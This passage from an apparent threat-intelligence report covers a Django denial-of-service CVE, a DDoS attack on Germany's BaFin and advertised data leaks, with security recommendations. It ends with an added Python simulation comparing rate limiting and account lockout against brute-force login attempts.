The vulnerability exists as the application does not properly control consumption of internal resources within the ‘django.utils.encoding.uri_to_iri()’ method.

Impact :
A remote attacker can pass a large number of characters to the affected method and perform a denial of service (DoS) attack.
Affected Products: https[:]//www.djangoproject[.]com/weblog/2023/sep/04/security-releases/

Recommendations:

  • Patch and Update: Immediately apply the security patches provided by Django to address CVE-2023-41164. Regularly update your Django CMS and associated libraries to protect against known vulnerabilities.
  • Layered Security Approach: Adopt a multi-layered security approach to protect your content management system. This should include firewalls, intrusion detection systems, access controls, and regular security audits

Latest Cyber-Attacks, Incidents, and Breaches

German financial agency has been experiencing disruptions due to a DDoS attack
Threat Actors: unknown
Attack Type: DDoS
Objective: Operational Disruption
Target Technology: Web Application
Target Geographies: Germany
Target Industries: Banking and Finance
Business Impact: Operational Disruption

Summary:
The German Federal Financial Supervisory Authority (BaFin) disclosed that its website has been under an ongoing distributed denial-of-service (DDoS) attack since last Friday. BaFin, as Germany’s financial regulatory body, operates under the Federal Ministry of Finance and holds the responsibility of overseeing 2,700 banks, 800 financial institutions, and 700 insurance service providers. The regulatory authority is recognized for its law enforcement functions both within Germany and on the global stage. Over the past few years, it has levied fines of $10 million against Deutsche Bank and $5 million against Bank of America for a range of infractions. The German agency announced that it has implemented all necessary security measures and defensive actions to protect its operations against cyberattacks. The perpetrators of the DDoS attack on the German financial authority remain unidentified, but there is speculation that pro-Russian hacktivists may be involved due to Germany’s supportive stance towards Ukraine, which includes providing financial and military equipment assistance.

Relevancy & Insights:

  • The ongoing distributed denial-of-service (DDoS) attack on BaFin’s website highlights the growing cybersecurity threats faced by financial regulatory bodies. Such attacks can disrupt essential services and impact the dissemination of crucial information to the public.
  • The DDoS attack on BaFin’s website highlights the vulnerability of financial regulatory authorities to cyber threats, the importance of cybersecurity measures, and the potential geopolitical motivations behind such attacks. It also emphasizes the critical role played by BaFin in maintaining the integrity of Germany’s financial sector and the need for transparency and public access to regulatory information.

ETLM Assessment:
Given Germany’s continued support for Ukraine in the war, including continued military aid, we assess that further DDoS attacks or similar targeting of other federal German institutions are likely. The DDoS attack on the German Federal Financial Supervisory Authority (BaFin) reflects the suspected threat actors’ motivation to disrupt and embarrass major institutions associated with governments that support the Ukrainian war effort.

Data Leaks

myBillBook’s Data Advertised in Leak Site

Attack Type: Data Leaks
Target Industry: Software
Target Geography: India
Target Technology: SQL Database
Objective: Data Theft, Financial Gains
Business Impact: Data Loss, Reputational Damage

Summary:
CYFIRMA Research team observed a potential data leak related to myBillBook, {www[.]niobook[.]com}. myBillBook GST billing software helps businesses create professional invoices in just a few clicks. The compromised data consists of public users’ IDs, emails, passwords, first names, last names, mobile numbers, and additional confidential information in SQL format, with a combined data size of 4 gigabytes.

Source: Underground forums

Relevancy & Insights:

  • Cybercriminals driven by the pursuit of financial gains are constantly searching for exposed and susceptible systems and software. The majority of these malicious actors conduct their activities in hidden online communities, where they discuss relevant matters and trade stolen digital assets. In contrast to other financially motivated groups such as ransomware or extortion syndicates, who often publicize their exploits, these perpetrators prefer to remain discreet. They secure unauthorized access and filch valuable information by capitalizing on unpatched software or exploiting vulnerabilities within systems or applications. The ill-gotten data is subsequently promoted for sale within clandestine online spaces, and it may be further sold and repurposed by fellow attackers in their own campaigns.

Other Observations

  • CYFIRMA Research team observed a potential data leak related to WPDeveloper, {www[.]wpdeveloper[.]com}. WPDeveloper is a dedicated product delivery and maintenance company for WordPress. The company is headquartered in the United States of America. The compromised data includes ID, email, hashed password, website URL, name, and other sensitive information.

Source: Underground forums

STRATEGIC RECOMMENDATIONS

  • Attack Surface Management should be adopted by organizations, ensuring that a continuous closed-loop process is created between attack surface monitoring and security testing.
  • Deploy a unified threat management strategy – including malware detection, deep learning neural networks, and anti-exploit technology – combined with vulnerability and risk mitigation processes.
  • Incorporate Digital Risk Protection (DRP) in the overall security posture that acts as a proactive defence against external threats targeting unsuspecting customers.
  • Implement a holistic security strategy that includes controls for attack surface reduction, effective patch management, active network monitoring through next-generation security solutions, and a ready-to-go incident response plan.
  • Create risk-based vulnerability management with deep knowledge about each asset. Assign a triaged risk score based on the type of vulnerability and the criticality of the asset to help ensure that the most severe and dangerous vulnerabilities are dealt with first.

MANAGEMENT RECOMMENDATIONS

  • Take advantage of global Cyber Intelligence providing valuable insights on threat actor activity, detection, and mitigation techniques.
  • Proactively monitor the effectiveness of the risk-based information security strategy, the security controls applied, and the proper implementation of security technologies, followed by corrective actions, remediations, and lessons learned.
  • Move beyond the traditional model of security awareness towards improved simulation and training exercises that mimic real attack scenarios, account for behaviours that lead to a compromise, and are measured against real attacks the organization receives.
  • Consider implementing Network Traffic Analysis (NTA) and Network Detection and Response (NDR) security systems to compensate for the shortcomings of EDR and SIEM solutions.
  • Test detection processes to ensure awareness of anomalous events. Communicate anomalies in a timely manner and continuously evolve detection to keep up with refined ransomware threats.

TACTICAL RECOMMENDATIONS

  • Patch software/applications as soon as updates are available. Where feasible, automated remediation should be deployed since vulnerabilities are one of the top attack vectors.
  • Consider using security automation to speed up threat detection, improve incident response, increase the visibility of security metrics, and rapidly execute security checklists.
  • Build and undertake safeguarding measures by monitoring/blocking the IOCs and strengthen defences based on the tactical intelligence provided.
  • Deploy detection technologies that are behavioural anomaly-based to detect ransomware attacks and help to take appropriate measures.
  • Implement a combination of security controls such as reCAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart), device fingerprinting, IP blocklisting, rate-limiting, and account lockout to thwart automated brute-force attacks.
  • Ensure email and web content filtering uses real-time blocklists, reputation services, and other similar mechanisms to avoid accepting content from known and potentially malicious sources.
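The rate-limiting and account-lockout controls recommended above against automated brute forcing behave differently against a password spray (one source, many accounts) and a targeted attack on one account from rotating sources. The following is an added illustration, not code from the CYFIRMA report or any product it covers; the thresholds, addresses and login events are constructed for the example.

```python
"""Added example: per-source rate limiting plus per-account lockout over a
constructed stream of login attempts (timestamp, source IP, account, success)."""
from collections import defaultdict, deque

RATE_WINDOW_SEC = 60    # sliding window for counting failures per source IP
RATE_MAX_FAILURES = 10  # failures a single source may accumulate in the window
LOCKOUT_FAILURES = 5    # consecutive failures that lock an account
LOCKOUT_SEC = 900       # lockout duration in seconds (assumed policy value)


class LoginGuard:
    """Decides whether an attempt may proceed, then records its outcome."""

    def __init__(self):
        self.source_failures = defaultdict(deque)  # ip -> failure timestamps
        self.account_failures = defaultdict(int)   # user -> consecutive failures
        self.locked_until = {}                     # user -> unlock timestamp

    def check(self, ts, ip, user, success):
        """Return 'allow', 'locked' or 'rate_limited' for one attempt."""
        if self.locked_until.get(user, 0) > ts:
            return "locked"          # lockout also blocks the legitimate owner
        window = self.source_failures[ip]
        while window and ts - window[0] >= RATE_WINDOW_SEC:
            window.popleft()         # drop failures that aged out of the window
        if len(window) >= RATE_MAX_FAILURES:
            return "rate_limited"    # source is spraying faster than permitted
        if success:
            self.account_failures[user] = 0
            return "allow"
        window.append(ts)
        self.account_failures[user] += 1
        if self.account_failures[user] >= LOCKOUT_FAILURES:
            self.locked_until[user] = ts + LOCKOUT_SEC
            self.account_failures[user] = 0
        return "allow"


def simulate(events):
    """Run constructed events through a fresh guard and return the decisions."""
    guard = LoginGuard()
    return [guard.check(*event) for event in events]


# Constructed: one source tries 12 different accounts within a minute.
SPRAY = [(t, "203.0.113.10", f"user{t}", False) for t in range(12)]
# Constructed: six sources each try the same account once, then its owner logs in.
ROTATING = [(t, f"198.51.100.{t}", "sa", False) for t in range(6)]
ROTATING.append((7, "192.0.2.5", "sa", True))

if __name__ == "__main__":
    print("spray:", simulate(SPRAY))        # rate limit stops attempts 11 and 12
    print("rotating:", simulate(ROTATING))  # lockout stops attempt 6 and the owner
```

The spray never locks an account (each sees one failure) and is caught only by the per-source limit, while the rotating attack never trips the per-source limit and is caught only by the lockout, which then also rejects the account's legitimate owner for the lockout period.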